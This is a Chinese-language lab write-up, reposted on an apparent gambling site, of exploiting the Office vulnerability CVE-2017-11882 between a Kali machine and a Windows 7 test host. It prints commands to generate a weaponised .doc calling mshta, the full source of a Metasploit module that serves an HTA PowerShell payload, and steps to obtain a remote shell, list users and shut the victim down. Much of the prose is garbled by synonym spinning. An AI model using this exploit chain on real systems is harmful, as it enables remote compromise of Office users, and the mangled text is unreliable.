来自 澳门新葡亰官网 2019-11-06 09:27 的文章
当前位置: 澳门新葡亰app > 澳门新葡亰官网 > 正文

澳门新葡亰app这里搭建两台虚拟机实行测量检验

 

Office隐敝17年的漏洞CVE_2017_11882测量检验记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参照小说1:

参谋小说2:

 

POC地址:

 

中间环节现身,msf连接数据库退步的状态,解决办法:

 

1.制作规范

 

 

这里搭建两台设想机进行测量试验!

 

测量试验机配置消息:

 

操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese

 

 

操作系统
Kali 2.1 中文
IP
192.168.1.104

 

第豆蔻年华在kali下安装nginx,只怕tomcat应该也是足以的,首先将扭转的doc文件放在/usr/share/nginx/html目录下,方便被攻击的机器获取doc文件。

 

启动nginx服务:systemctl start nginx

 

使用Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c "mshta ;; -o cev2.doc

# 将下载好的漏洞模块放在msf自便目录下

root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_11882.rb的从头到尾的经过如下:

##

# This module requires Metasploit:

# Current source:

##

class MetasploitModule  < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info  = {})

    super(update_info(info,

      'Name' => 'Microsoft Office Payload Delivery',

      'Description' => %q{

        This module generates an command to place within

        a word document, that when executed, will retrieve a HTA payload

        via HTTP from an web server. Currently have not figured out how

        to generate a doc.

      },

      'License' => MSF_LICENSE,

      'Arch' => ARCH_X86,

      'Platform' => 'win',

      'Targets' =>

        [

          ['Automatic', {} ],

        ],

      'DefaultTarget' => 0,

    ))

  end

  def on_request_uri(cli, _request)

    print_status("Delivering payload")

    p = regenerate_payload(cli)

    data = Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_X86,

      'win',

      p.encoded,

      'hta-psh',

      { :arch => ARCH_X86, :platform => 'win '}

    )

    send_response(cli, data, 'Content-Type' => 'application/hta')

  end

  def primer

    url = get_uri

    print_status("Place the following DDE in an MS document:")

    print_line("mshta.exe "#{url}"")

  end

 

然后,这里在应用msfconsole以前,须求先开拓数据库,举个例子 service postgresql start 

开拓数据库之后,步入msfconsole,然后对msf实行开始化,推行msf init

之后search cve_2017_11882搜寻漏洞模块,然后依据【参照他事他说加以考查小说2】举办配置,最后exploit 之后运转对 8080 端口的监听,至于怎么是8080端口小编也不太领会啊!

 

2.有备无患,临门一脚

 

以此时候,只供给在 win7 上经过浏览器的到 cve2.doc文书档案,展开今后,kali中命令行马上显示已经取拿到了三番五次,

澳门新葡亰app 1

澳门新葡亰app 2

session命令获得回答,session -i 【id】创建连接

shell命令能够得到cmd,施行net user查看客商

澳门新葡亰app 3

澳门新葡亰app 4

 

3.试验效果

 

由此这几个漏洞,能够明火执杖的履行一些发令,举个例子关机,删除一些文书,搜集一些类别消息恐怕很平价的

在桌面新建文件夹

澳门新葡亰app 5

远程关机

澳门新葡亰app 6

虽说获得到了命令行,不过经过net user命令能够看看登入的客商等第是Guest,那就节制了一些内需权限较高的下令执行!

还要这里win7未有安装杀软,小编不知情安装杀软之后word文书档案会不会被查杀呢?

 

 

本文由澳门新葡亰app发布于澳门新葡亰官网,转载请注明出处:澳门新葡亰app这里搭建两台虚拟机实行测量检验

关键词: